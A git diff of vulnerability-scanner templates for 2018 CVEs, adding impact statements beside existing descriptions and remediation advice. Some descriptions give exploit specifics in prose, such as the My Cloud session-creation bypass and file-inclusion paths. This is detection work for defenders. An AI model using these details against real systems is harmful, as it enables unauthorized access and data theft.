@@ -6,6 +6,8 @@ info: severity: critical description: | It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS. remediation: | Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 31aee92b5e..35a45264a0 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index c042fc16a0..da3a6765e0 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -5,6 +5,8 @@ info: author: Suman_Kar severity: critical description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Update or remove the affected plugin. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index a8119475c3..168a8a59b3 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index fc0f098193..c8587f47bf 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 170c430715..19fa890a4f 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml 
@@ -5,6 +5,8 @@ info: author: nadino severity: medium description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 28f69ae336..da2d9609eb 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster. remediation: | Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index b5765e9727..2a20e5d184 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version. + impact: | + Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server. remediation: | Upgrade to a patched version of Centos Web Panel. reference: diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 09f8ccea5c..bb9fb45a34 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Planon before Live Build 41 is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build. reference: diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index cfa7a538cc..6a84821cb5 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index a142d295d1..703a5a61af 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application. reference: diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 74da5445c3..bbb88b1fc6 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a newer version of Microstrategy Web. reference: diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 06e4aba825..f6ec3b29d4 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server. remediation: | Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 9a51288ed7..f231a43a1b 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + impact: | + An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. reference: diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index dd331fb52b..64b1389669 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: This issue will be fixed by updating to the latest version of Gogs. reference: - https://www.anquanke.com/post/id/163575 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 1ad9c457c0..92b0435e8e 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 444d0d5ac8..2d9c1fd8cd 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index a00f827d5f..bbf286ff38 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index b5596e6a16..9d63516626 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files. + impact: | + Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system. remediation: | Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 3bc4c1bd4b..2086807d13 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index c8cf32bdcc..f0fc704e8f 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. reference: diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 0b22244cc8..389386fc8e 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions. remediation: Fixed in later versions including 5.4. reference: - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 5740248ca0..d6b6b8239c 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 2e976b03d9..df836c9fe5 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 660a41d241..c66fbbd968 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 23683ce194..a39e661b52 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index d2613321b6..202566e440 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system. remediation: | Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 1288f9a019..6b3887ff83 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 2a0220487a..89805135bd 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 0a2ea63978..59b16c7d8c 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 23c58dc254..f49c568274 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index d4f809c7e3..5074b2d47c 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 3e6c0186dc..f76142ba02 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 96fc7edf6a..c4c983e247 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 3553bcee82..d5ab052e3d 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index c8cb6a933e..780e67c876 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary. reference: diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4b7b77f79f..a4423ff93d 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 5f4fcf7284..f3293810d6 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 2b37f2e880..4a405e6d7f 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as server configuration details. remediation: | Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 112dfd0b74..f4e6ea58c8 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 53df56cad1..f355469d35 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + impact: | + The vulnerability allows an attacker to include local files and execute arbitrary code on the server. remediation: | Update to the latest version of WordPress Payeezy Pay plugin. reference: diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 25239d8627..6e59b045d6 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise. remediation: | Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet. reference: diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index b7b9fac828..9e8517289b 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot,leovalcante severity: high description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches provided by Oracle to address this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index e08a3145a0..fe426d4785 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ 